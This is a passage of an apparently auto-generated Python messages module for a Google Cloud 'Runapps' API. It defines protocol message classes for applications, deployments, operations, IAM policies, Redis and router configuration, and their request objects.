availability_type = _messages.StringField(2)
disk_size = _messages.IntegerField(3, variant=_messages.Variant.INT32)
disk_type = _messages.StringField(4)
tier = _messages.StringField(5)
class CloudStorage(_messages.Message):
r"""Configures a Cloud Storage location.
Fields:
bucket: Google Cloud Storage bucket containing the source (see Bucket Name
Requirements).
object: Google Cloud Storage object containing the source.
"""
bucket = _messages.StringField(1)
object = _messages.StringField(2)
class Config(_messages.Message):
r"""Message for the Application Config Next tag: 6
Messages:
ResourcesValue: A ResourcesValue object.
Fields:
config: A byte array encapsulating the contents of the application config.
This can be of any type of supported config (Simple SAF Yaml, multi-file
in-app config, etc.)
resources: A ResourcesValue attribute.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class ResourcesValue(_messages.Message):
r"""A ResourcesValue object.
Messages:
AdditionalProperty: An additional property for a ResourcesValue object.
Fields:
additionalProperties: Additional properties of type ResourcesValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ResourcesValue object.
Fields:
key: Name of the additional property.
value: A ResourceConfig attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('ResourceConfig', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
config = _messages.BytesField(1)
resources = _messages.MessageField('ResourcesValue', 2)
class Deployment(_messages.Message):
r"""Message describing Deployment object Next tag: 13
Messages:
AnnotationsValue: Unstructured key value map that may be set by external
tools to store and arbitrary metadata. They are not queryable and should
be preserved when modifying objects. This field follows Kubernetes
annotations' namespacing, limits, and rules. More info:
http://kubernetes.io/docs/user-guide/annotations
LabelsValue: Labels as key value pairs
Fields:
annotations: Unstructured key value map that may be set by external tools
to store and arbitrary metadata. They are not queryable and should be
preserved when modifying objects. This field follows Kubernetes
annotations' namespacing, limits, and rules. More info:
http://kubernetes.io/docs/user-guide/annotations
application: Output only. The name of the parent application.
createSelector: Optional selectors that should be applied to limit the
scope of the deployment creation.
createTime: Output only. Create time stamp
deleteSelector: Optional selectors that should be applied to limit the
scope of the deployment deletion.
deleteTime: Output only. For a deleted resource, the deletion time. It is
only populated as a response to a Delete request.
etag: Output only. A system-generated fingerprint for this version of the
resource. May be used to detect modification conflict during updates.
labels: Labels as key value pairs
name: Output only. Canonical name of resource
reconciling: Output only. Indicates whether the resource's reconciliation
is still in progress.
render: If specified, the configurations for the deployment will be output
as described but the underlying resources will not be actuated.
serviceAccount: Email address of the service account to use for the
resource actuation.
status: Output only. The status of the deployment
updateTime: Output only. Update time stamp
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class AnnotationsValue(_messages.Message):
r"""Unstructured key value map that may be set by external tools to store
and arbitrary metadata. They are not queryable and should be preserved
when modifying objects. This field follows Kubernetes annotations'
namespacing, limits, and rules. More info: http://kubernetes.io/docs/user-
guide/annotations
Messages:
AdditionalProperty: An additional property for a AnnotationsValue
object.
Fields:
additionalProperties: Additional properties of type AnnotationsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a AnnotationsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Labels as key value pairs
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
annotations = _messages.MessageField('AnnotationsValue', 1)
application = _messages.StringField(2)
createSelector = _messages.MessageField('Selector', 3)
createTime = _messages.StringField(4)
deleteSelector = _messages.MessageField('Selector', 5)
deleteTime = _messages.StringField(6)
etag = _messages.StringField(7)
labels = _messages.MessageField('LabelsValue', 8)
name = _messages.StringField(9)
reconciling = _messages.BooleanField(10)
render = _messages.MessageField('Render', 11)
serviceAccount = _messages.StringField(12)
status = _messages.MessageField('DeploymentStatus', 13)
updateTime = _messages.StringField(14)
class DeploymentStatus(_messages.Message):
r"""Message to encapsulate the current status of the deployment.
Fields:
errorMessage: The error message associated with a failed deployment state,
if applicable.
status: The status message associated with the current state of the
deployment.
"""
errorMessage = _messages.StringField(1)
status = _messages.StringField(2)
class Empty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo { rpc
Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
representation for `Empty` is empty JSON object `{}`.
"""
class Expr(_messages.Message):
r"""Represents a textual expression in the Common Expression Language (CEL)
syntax. CEL is a C-like expression language. The syntax and semantics of CEL
are documented at https://github.com/google/cel-spec. Example (Comparison):
title: "Summary size limit" description: "Determines if a summary is less
than 100 chars" expression: "document.summary.size() < 100" Example
(Equality): title: "Requestor is owner" description: "Determines if
requestor is the document owner" expression: "document.owner ==
request.auth.claims.email" Example (Logic): title: "Public documents"
description: "Determine whether the document should be publicly visible"
expression: "document.type != 'private' && document.type != 'internal'"
Example (Data Manipulation): title: "Notification string" description:
"Create a notification string with a timestamp." expression: "'New message
received at ' + string(document.create_time)" The exact variables and
functions that may be referenced within an expression are determined by the
service that evaluates it. See the service documentation for additional
information.
Fields:
description: Optional. Description of the expression. This is a longer
text which describes the expression, e.g. when hovered over it in a UI.
expression: Textual representation of an expression in Common Expression
Language syntax.
location: Optional. String indicating the location of the expression for
error reporting, e.g. a file name and a position in the file.
title: Optional. Title for the expression, i.e. a short string describing
its purpose. This can be used e.g. in UIs which allow to enter the
expression.
"""
description = _messages.StringField(1)
expression = _messages.StringField(2)
location = _messages.StringField(3)
title = _messages.StringField(4)
class GcpResourceStatus(_messages.Message):
r"""Status for a GCP resource.
Enums:
StateValueValuesEnum: The state of the GCP resource.
Fields:
errorMessage: The error message associated with the GCP resource, if
applicable.
gcpResourceName: The full path of the GCP resource, which can be used to
query other GCP services.
state: The state of the GCP resource.
type: The type of the GCP resource (e.g. "redis").
"""
class StateValueValuesEnum(_messages.Enum):
r"""The state of the GCP resource.
Values:
GCP_RESOURCE_STATE_UNKNOWN: <no description>
GCP_RESOURCE_STATE_DEPLOYED: The resource has been deployed.
"""
GCP_RESOURCE_STATE_UNKNOWN = 0
GCP_RESOURCE_STATE_DEPLOYED = 1
errorMessage = _messages.StringField(1)
gcpResourceName = _messages.StringField(2)
state = _messages.EnumField('StateValueValuesEnum', 3)
type = _messages.StringField(4)
class ListApplicationsResponse(_messages.Message):
r"""Message for response to listing Applications
Fields:
applications: The list of Application
nextPageToken: A token identifying a page of results the server should
return.
unreachable: Locations that could not be reached.
"""
applications = _messages.MessageField('Application', 1, repeated=True)
nextPageToken = _messages.StringField(2)
unreachable = _messages.StringField(3, repeated=True)
class ListDeploymentsResponse(_messages.Message):
r"""Message for response to listing Deployments
Fields:
deployments: The list of Deployment
nextPageToken: A token identifying a page of results the server should
return.
unreachable: Locations that could not be reached.
"""
deployments = _messages.MessageField('Deployment', 1, repeated=True)
nextPageToken = _messages.StringField(2)
unreachable = _messages.StringField(3, repeated=True)
class ListLocationsResponse(_messages.Message):
r"""The response message for Locations.ListLocations.
Fields:
locations: A list of locations that matches the specified filter in the
request.
nextPageToken: The standard List next-page token.
"""
locations = _messages.MessageField('Location', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class ListOperationsResponse(_messages.Message):
r"""The response message for Operations.ListOperations.
Fields:
nextPageToken: The standard List next-page token.
operations: A list of operations that matches the specified filter in the
request.
"""
nextPageToken = _messages.StringField(1)
operations = _messages.MessageField('Operation', 2, repeated=True)
class Location(_messages.Message):
r"""A resource that represents Google Cloud Platform location.
Messages:
LabelsValue: Cross-service attributes for the location. For example
{"cloud.googleapis.com/region": "us-east1"}
MetadataValue: Service-specific metadata. For example the available
capacity at the given location.
Fields:
displayName: The friendly name for this location, typically a nearby city
name. For example, "Tokyo".
labels: Cross-service attributes for the location. For example
{"cloud.googleapis.com/region": "us-east1"}
locationId: The canonical id for this location. For example: `"us-east1"`.
metadata: Service-specific metadata. For example the available capacity at
the given location.
name: Resource name for the location, which may vary between
implementations. For example: `"projects/example-project/locations/us-
east1"`
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Cross-service attributes for the location. For example
{"cloud.googleapis.com/region": "us-east1"}
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
@encoding.MapUnrecognizedFields('additionalProperties')
class MetadataValue(_messages.Message):
r"""Service-specific metadata. For example the available capacity at the
given location.
Messages:
AdditionalProperty: An additional property for a MetadataValue object.
Fields:
additionalProperties: Properties of the object. Contains field @type
with type URL.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MetadataValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
displayName = _messages.StringField(1)
labels = _messages.MessageField('LabelsValue', 2)
locationId = _messages.StringField(3)
metadata = _messages.MessageField('MetadataValue', 4)
name = _messages.StringField(5)
class Operation(_messages.Message):
r"""This resource represents a long-running operation that is the result of
a network API call.
Messages:
MetadataValue: Service-specific metadata associated with the operation. It
typically contains progress information and common metadata such as
create time. Some services might not provide such metadata. Any method
that returns a long-running operation should document the metadata type,
if any.
ResponseValue: The normal response of the operation in case of success. If
the original method returns no data on success, such as `Delete`, the
response is `google.protobuf.Empty`. If the original method is standard
`Get`/`Create`/`Update`, the response should be the resource. For other
methods, the response should have the type `XxxResponse`, where `Xxx` is
the original method name. For example, if the original method name is
`TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.
Fields:
done: If the value is `false`, it means the operation is still in
progress. If `true`, the operation is completed, and either `error` or
`response` is available.
error: The error result of the operation in case of failure or
cancellation.
metadata: Service-specific metadata associated with the operation. It
typically contains progress information and common metadata such as
create time. Some services might not provide such metadata. Any method
that returns a long-running operation should document the metadata type,
if any.
name: The server-assigned name, which is only unique within the same
service that originally returns it. If you use the default HTTP mapping,
the `name` should be a resource name ending with
`operations/{unique_id}`.
response: The normal response of the operation in case of success. If the
original method returns no data on success, such as `Delete`, the
response is `google.protobuf.Empty`. If the original method is standard
`Get`/`Create`/`Update`, the response should be the resource. For other
methods, the response should have the type `XxxResponse`, where `Xxx` is
the original method name. For example, if the original method name is
`TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class MetadataValue(_messages.Message):
r"""Service-specific metadata associated with the operation. It typically
contains progress information and common metadata such as create time.
Some services might not provide such metadata. Any method that returns a
long-running operation should document the metadata type, if any.
Messages:
AdditionalProperty: An additional property for a MetadataValue object.
Fields:
additionalProperties: Properties of the object. Contains field @type
with type URL.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MetadataValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
@encoding.MapUnrecognizedFields('additionalProperties')
class ResponseValue(_messages.Message):
r"""The normal response of the operation in case of success. If the
original method returns no data on success, such as `Delete`, the response
is `google.protobuf.Empty`. If the original method is standard
`Get`/`Create`/`Update`, the response should be the resource. For other
methods, the response should have the type `XxxResponse`, where `Xxx` is
the original method name. For example, if the original method name is
`TakeSnapshot()`, the inferred response type is `TakeSnapshotResponse`.
Messages:
AdditionalProperty: An additional property for a ResponseValue object.
Fields:
additionalProperties: Properties of the object. Contains field @type
with type URL.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ResponseValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
done = _messages.BooleanField(1)
error = _messages.MessageField('Status', 2)
metadata = _messages.MessageField('MetadataValue', 3)
name = _messages.StringField(4)
response = _messages.MessageField('ResponseValue', 5)
class OperationMetadata(_messages.Message):
r"""Represents the metadata of the long-running operation.
Fields:
apiVersion: API version used to start the operation.
createTime: The time the operation was created.
endTime: The time the operation finished running.
requestedCancellation: Identifies whether the user has requested
cancellation of the operation. Operations that have successfully been
cancelled have Operation.error value with a google.rpc.Status.code of 1,
corresponding to `Code.CANCELLED`.
statusMessage: Human-readable status of the operation, if any.
target: Server-defined resource path for the target of the operation.
verb: Name of the verb executed by the operation.
"""
apiVersion = _messages.StringField(1)
createTime = _messages.StringField(2)
endTime = _messages.StringField(3)
requestedCancellation = _messages.BooleanField(4)
statusMessage = _messages.StringField(5)
target = _messages.StringField(6)
verb = _messages.StringField(7)
class Policy(_messages.Message):
r"""An Identity and Access Management (IAM) policy, which specifies access
controls for Google Cloud resources. A `Policy` is a collection of
`bindings`. A `binding` binds one or more `members`, or principals, to a
single `role`. Principals can be user accounts, service accounts, Google
groups, and domains (such as G Suite). A `role` is a named list of
permissions; each `role` can be an IAM predefined role or a user-created
custom role. For some types of Google Cloud resources, a `binding` can also
specify a `condition`, which is a logical expression that allows access to a
resource only if the expression evaluates to `true`. A condition can add
constraints based on attributes of the request, the resource, or both. To
learn which resources support conditions in their IAM policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies). **JSON example:** { "bindings": [ { "role":
"roles/resourcemanager.organizationAdmin", "members": [
"user:mike@example.com", "group:admins@example.com", "domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com" ] }, { "role":
"roles/resourcemanager.organizationViewer", "members": [
"user:eve@example.com" ], "condition": { "title": "expirable access",
"description": "Does not grant access after Sep 2020", "expression":
"request.time < timestamp('2020-10-01T00:00:00.000Z')", } } ], "etag":
"BwWWja0YfJA=", "version": 3 } **YAML example:** bindings: - members: -
user:mike@example.com - group:admins@example.com - domain:google.com -
serviceAccount:my-project-id@appspot.gserviceaccount.com role:
roles/resourcemanager.organizationAdmin - members: - user:eve@example.com
role: roles/resourcemanager.organizationViewer condition: title: expirable
access description: Does not grant access after Sep 2020 expression:
request.time < timestamp('2020-10-01T00:00:00.000Z') etag: BwWWja0YfJA=
version: 3 For a description of IAM and its features, see the [IAM
documentation](https://cloud.google.com/iam/docs/).
Fields:
bindings: Associates a list of `members`, or principals, with a `role`.
Optionally, may specify a `condition` that determines how and when the
`bindings` are applied. Each of the `bindings` must contain at least one
principal. The `bindings` in a `Policy` can refer to up to 1,500
principals; up to 250 of these principals can be Google groups. Each
occurrence of a principal counts towards these limits. For example, if
the `bindings` grant 50 different roles to `user:alice@example.com`, and
not to any other principal, then you can add another 1,450 principals to
the `bindings` in the `Policy`.
etag: `etag` is used for optimistic concurrency control as a way to help
prevent simultaneous updates of a policy from overwriting each other. It
is strongly suggested that systems make use of the `etag` in the read-
modify-write cycle to perform policy updates in order to avoid race
conditions: An `etag` is returned in the response to `getIamPolicy`, and
systems are expected to put that etag in the request to `setIamPolicy`
to ensure that their change will be applied to the same version of the
policy. **Important:** If you use IAM Conditions, you must include the
`etag` field whenever you call `setIamPolicy`. If you omit this field,
then IAM allows you to overwrite a version `3` policy with a version `1`
policy, and all of the conditions in the version `3` policy are lost.
version: Specifies the format of the policy. Valid values are `0`, `1`,
and `3`. Requests that specify an invalid value are rejected. Any
operation that affects conditional role bindings must specify version
`3`. This requirement applies to the following operations: * Getting a
policy that includes a conditional role binding * Adding a conditional
role binding to a policy * Changing a conditional role binding in a
policy * Removing any role binding, with or without a condition, from a
policy that includes conditions **Important:** If you use IAM
Conditions, you must include the `etag` field whenever you call
`setIamPolicy`. If you omit this field, then IAM allows you to overwrite
a version `3` policy with a version `1` policy, and all of the
conditions in the version `3` policy are lost. If a policy does not
include any conditions, operations on that policy may specify any valid
version or leave the field unset. To learn which resources support
conditions in their IAM policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies).
"""
bindings = _messages.MessageField('Binding', 1, repeated=True)
etag = _messages.BytesField(2)
version = _messages.IntegerField(3, variant=_messages.Variant.INT32)
class RedisConfig(_messages.Message):
r"""Message for Redis configs.
Fields:
instance: Configs for the Redis instance.
"""
instance = _messages.MessageField('RedisInstanceConfig', 1)
class RedisInstanceConfig(_messages.Message):
r"""Message for Redis instance configs.
Messages:
RedisParametersValue: The "raw" Redis configs:
https://redis.io/topics/config
Fields:
memory_size_gb: The redis instance memory size, in GB.
redis_parameters: The "raw" Redis configs: https://redis.io/topics/config
tier: The Redis instance tier, e.g. "STANDARD_HA".
version: The Redis instance version, e.g. "REDIS_4_0".
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class RedisParametersValue(_messages.Message):
r"""The "raw" Redis configs: https://redis.io/topics/config
Messages:
AdditionalProperty: An additional property for a RedisParametersValue
object.
Fields:
additionalProperties: Additional properties of type RedisParametersValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a RedisParametersValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
memory_size_gb = _messages.IntegerField(1, variant=_messages.Variant.INT32)
redis_parameters = _messages.MessageField('RedisParametersValue', 2)
tier = _messages.StringField(3)
version = _messages.StringField(4)
class Render(_messages.Message):
r"""Message to encapsulate the parameters for a Render.
Enums:
FormatValueValuesEnum: The format in which to render the Application.
Fields:
format: The format in which to render the Application.
outputLocation: The output location to push the rendered configs to.
"""
class FormatValueValuesEnum(_messages.Enum):
r"""The format in which to render the Application.
Values:
RENDER_FORMAT_UNKNOWN: No render format specified.
RENDER_FORMAT_TERRAFORM: Render into Terraform configs.
RENDER_FORMAT_KRM: Render into KRM configs.
"""
RENDER_FORMAT_UNKNOWN = 0
RENDER_FORMAT_TERRAFORM = 1
RENDER_FORMAT_KRM = 2
format = _messages.EnumField('FormatValueValuesEnum', 1)
outputLocation = _messages.MessageField('Target', 2)
class ResourceConfig(_messages.Message):
r"""Message for the Resource configuration.
Fields:
cloudsql: CloudSql configuration.
redis: Redis configuration.
router: Router configuration.
service: Cloud Run service configuration.
vpc: VPC configuration.
"""
cloudsql = _messages.MessageField('CloudSqlConfig', 1)
redis = _messages.MessageField('RedisConfig', 2)
router = _messages.MessageField('RouterConfig', 3)
service = _messages.MessageField('CloudRunServiceConfig', 4)
vpc = _messages.MessageField('VPCConfig', 5)
class ResourceStatus(_messages.Message):
r"""Status for a resource.
Enums:
StateValueValuesEnum: The enum status of the resource.
Fields:
errorMessage: The error message associated with the resource, if
applicable.
gcpResource: Repeated field with status per GCP resource created for this
resource.
resourceName: Name of the resource, pulled from the Application Config.
state: The enum status of the resource.
type: Type of resource.
"""
class StateValueValuesEnum(_messages.Enum):
r"""The enum status of the resource.
Values:
RESOURCE_STATE_UNKNOWN: <no description>
RESOURCE_STATE_DEPLOYED: The resource has been deployed.
"""
RESOURCE_STATE_UNKNOWN = 0
RESOURCE_STATE_DEPLOYED = 1
errorMessage = _messages.StringField(1)
gcpResource = _messages.MessageField('GcpResourceStatus', 2, repeated=True)
resourceName = _messages.StringField(3)
state = _messages.EnumField('StateValueValuesEnum', 4)
type = _messages.StringField(5)
class Route(_messages.Message):
r"""Message for a single routeable resource within a Router.
Fields:
cdn: Whether to enable CDN on the route.
paths: List of paths to be routed to this route. e.g. ["/*, /api/*"]. The
path must fit the constraints at https://cloud.google.com/load-
balancing/docs/url-map-concepts#pm-constraints.
ref: Required. A reference to the resource in the config to which this is
routing. e.g. "cloudsql/sql_db".
"""
cdn = _messages.BooleanField(1)
paths = _messages.StringField(2, repeated=True)
ref = _messages.StringField(3)
class RouterConfig(_messages.Message):
r"""Message for a Router resource.
Fields:
default_route: The default route config. The URL paths field is not
required for this route config.
dns_zone: DNSZone represents an existing DNS zone for the router. It's
used for bring-your-own-DNSZone case. If empty, a new managed DNS zone
shall be created.
domain: Domain name to associate with the router.
routes: A list of route configurations to associate with the router. Each
Route configuration must include a paths configuration.
"""
default_route = _messages.MessageField('Route', 1)
dns_zone = _messages.StringField(2)
domain = _messages.StringField(3)
routes = _messages.MessageField('Route', 4, repeated=True)
class RunappsProjectsLocationsApplicationsCreateRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsCreateRequest object.
Fields:
application: A Application resource to be passed as the request body.
applicationId: Required. Id of the requesting object If auto-generating Id
server-side, remove this field and application_id from the
method_signature of Create RPC
parent: Required. Value for parent.
requestId: An optional request ID to identify requests. Specify a unique
request ID so that if you must retry your request, the server will know
to ignore the request if it has already been completed. The server will
guarantee that for at least 60 minutes since the first request. For
example, consider a situation where you make an initial request and t he
request times out. If you make the request again with the same request
ID, the server can check if original operation with the same request ID
was received, and if so, will ignore the second request. This prevents
clients from accidentally creating duplicate commitments. The request ID
must be a valid UUID with the exception that zero UUID is not supported
(00000000-0000-0000-0000-000000000000).
"""
application = _messages.MessageField('Application', 1)
applicationId = _messages.StringField(2)
parent = _messages.StringField(3, required=True)
requestId = _messages.StringField(4)
class RunappsProjectsLocationsApplicationsDeleteRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsDeleteRequest object.
Fields:
name: Required. Name of the resource
requestId: Optional. An optional request ID to identify requests. Specify
a unique request ID so that if you must retry your request, the server
will know to ignore the request if it has already been completed. The
server will guarantee that for at least 60 minutes after the first
request. For example, consider a situation where you make an initial
request and t he request times out. If you make the request again with
the same request ID, the server can check if original operation with the
same request ID was received, and if so, will ignore the second request.
This prevents clients from accidentally creating duplicate commitments.
The request ID must be a valid UUID with the exception that zero UUID is
not supported (00000000-0000-0000-0000-000000000000).
"""
name = _messages.StringField(1, required=True)
requestId = _messages.StringField(2)
class RunappsProjectsLocationsApplicationsDeploymentsCreateRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsDeploymentsCreateRequest object.
Fields:
deployment: A Deployment resource to be passed as the request body.
deploymentId: Required. Id of the requesting object If auto-generating Id
server-side, remove this field and deployment_id from the
method_signature of Create RPC
parent: Required. Value for parent.
requestId: An optional request ID to identify requests. Specify a unique
request ID so that if you must retry your request, the server will know
to ignore the request if it has already been completed. The server will
guarantee that for at least 60 minutes since the first request. For
example, consider a situation where you make an initial request and t he
request times out. If you make the request again with the same request
ID, the server can check if original operation with the same request ID
was received, and if so, will ignore the second request. This prevents
clients from accidentally creating duplicate commitments. The request ID
must be a valid UUID with the exception that zero UUID is not supported
(00000000-0000-0000-0000-000000000000).
validateOnly: If true, the Create request will just do a dry run of the
deploy instead of actuating anything.
"""
deployment = _messages.MessageField('Deployment', 1)
deploymentId = _messages.StringField(2)
parent = _messages.StringField(3, required=True)
requestId = _messages.StringField(4)
validateOnly = _messages.BooleanField(5)
class RunappsProjectsLocationsApplicationsDeploymentsGetRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsDeploymentsGetRequest object.
Fields:
name: Required. Name of the resource
"""
name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsApplicationsDeploymentsListRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsDeploymentsListRequest object.
Fields:
filter: Filtering results
orderBy: Hint for how to order the results
pageSize: Requested page size. Server may return fewer items than
requested. If unspecified, server will pick an appropriate default.
pageToken: A token identifying a page of results the server should return.
parent: Required. Parent value for ListDeploymentsRequest
"""
filter = _messages.StringField(1)
orderBy = _messages.StringField(2)
pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(4)
parent = _messages.StringField(5, required=True)
class RunappsProjectsLocationsApplicationsGetIamPolicyRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsGetIamPolicyRequest object.
Fields:
options_requestedPolicyVersion: Optional. The maximum policy version that
will be used to format the policy. Valid values are 0, 1, and 3.
Requests specifying an invalid value will be rejected. Requests for
policies with any conditional role bindings must specify version 3.
Policies with no conditional role bindings may specify any valid value
or leave the field unset. The policy in the response might use the
policy version that you specified, or it might use a lower policy
version. For example, if you specify version 3, but the policy has no
conditional role bindings, the response uses version 1. To learn which
resources support conditions in their IAM policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies).
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
options_requestedPolicyVersion = _messages.IntegerField(1, variant=_messages.Variant.INT32)
resource = _messages.StringField(2, required=True)
class RunappsProjectsLocationsApplicationsGetRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsGetRequest object.
Fields:
name: Required. Name of the resource
"""
name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsApplicationsGetStatusRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsGetStatusRequest object.
Fields:
name: Required. Name of the resource
"""
name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsApplicationsListRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsListRequest object.
Fields:
filter: Filtering results
orderBy: Hint for how to order the results
pageSize: Requested page size. Server may return fewer items than
requested. If unspecified, server will pick an appropriate default.
pageToken: A token identifying a page of results the server should return.
parent: Required. Parent value for ListApplicationsRequest
"""
filter = _messages.StringField(1)
orderBy = _messages.StringField(2)
pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(4)
parent = _messages.StringField(5, required=True)
class RunappsProjectsLocationsApplicationsPatchRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsPatchRequest object.
Fields:
application: A Application resource to be passed as the request body.
name: name of resource
requestId: An optional request ID to identify requests. Specify a unique
request ID so that if you must retry your request, the server will know
to ignore the request if it has already been completed. The server will
guarantee that for at least 60 minutes since the first request. For
example, consider a situation where you make an initial request and t he
request times out. If you make the request again with the same request
ID, the server can check if original operation with the same request ID
was received, and if so, will ignore the second request. This prevents
clients from accidentally creating duplicate commitments. The request ID
must be a valid UUID with the exception that zero UUID is not supported
(00000000-0000-0000-0000-000000000000).
updateMask: Required. Field mask is used to specify the fields to be
overwritten in the Application resource by the update. The fields
specified in the update_mask are relative to the resource, not the full
request. A field will be overwritten if it is in the mask. If the user
does not provide a mask then all fields will be overwritten.
"""
application = _messages.MessageField('Application', 1)
name = _messages.StringField(2, required=True)
requestId = _messages.StringField(3)
updateMask = _messages.StringField(4)
class RunappsProjectsLocationsApplicationsSetIamPolicyRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class RunappsProjectsLocationsApplicationsTestIamPermissionsRequest(_messages.Message):
r"""A RunappsProjectsLocationsApplicationsTestIamPermissionsRequest object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class RunappsProjectsLocationsGetRequest(_messages.Message):
r"""A RunappsProjectsLocationsGetRequest object.
Fields:
name: Resource name for the location.
"""
name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsListRequest(_messages.Message):
r"""A RunappsProjectsLocationsListRequest object.
Fields:
filter: A filter to narrow down results to a preferred subset. The
filtering language accepts strings like "displayName=tokyo", and is
documented in more detail in [AIP-160](https://google.aip.dev/160).
name: The resource that owns the locations collection, if applicable.
pageSize: The maximum number of results to return. If not set, the service
selects a default.
pageToken: A page token received from the `next_page_token` field in the
response. Send that page token to receive the subsequent page.
"""
filter = _messages.StringField(1)
name = _messages.StringField(2, required=True)
pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(4)
class RunappsProjectsLocationsOperationsCancelRequest(_messages.Message):
r"""A RunappsProjectsLocationsOperationsCancelRequest object.
Fields:
cancelOperationRequest: A CancelOperationRequest resource to be passed as
the request body.
name: The name of the operation resource to be cancelled.
"""
cancelOperationRequest = _messages.MessageField('CancelOperationRequest', 1)
name = _messages.StringField(2, required=True)
class RunappsProjectsLocationsOperationsDeleteRequest(_messages.Message):
r"""A RunappsProjectsLocationsOperationsDeleteRequest object.
Fields:
name: The name of the operation resource to be deleted.
"""
name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsOperationsGetRequest(_messages.Message):
r"""A RunappsProjectsLocationsOperationsGetRequest object.
Fields:
name: The name of the operation resource.
"""
name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsOperationsListRequest(_messages.Message):
r"""A RunappsProjectsLocationsOperationsListRequest object.
Fields:
filter: The standard list filter.
name: The name of the operation's parent resource.
pageSize: The standard list page size.
pageToken: The standard list page token.
"""
filter = _messages.StringField(1)
name = _messages.StringField(2, required=True)
pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(4)
class Selector(_messages.Message):
r"""Message for selecting the resources within an application. Next tag: 3
Fields:
matchTypeNames: match_type_names is a list resource name + type to match.
Use '*' or empty string for wildcard either the name or the type. E.g.
type='service' name='' will match all services. type='*' name='default'
will match all resources named as 'default'.
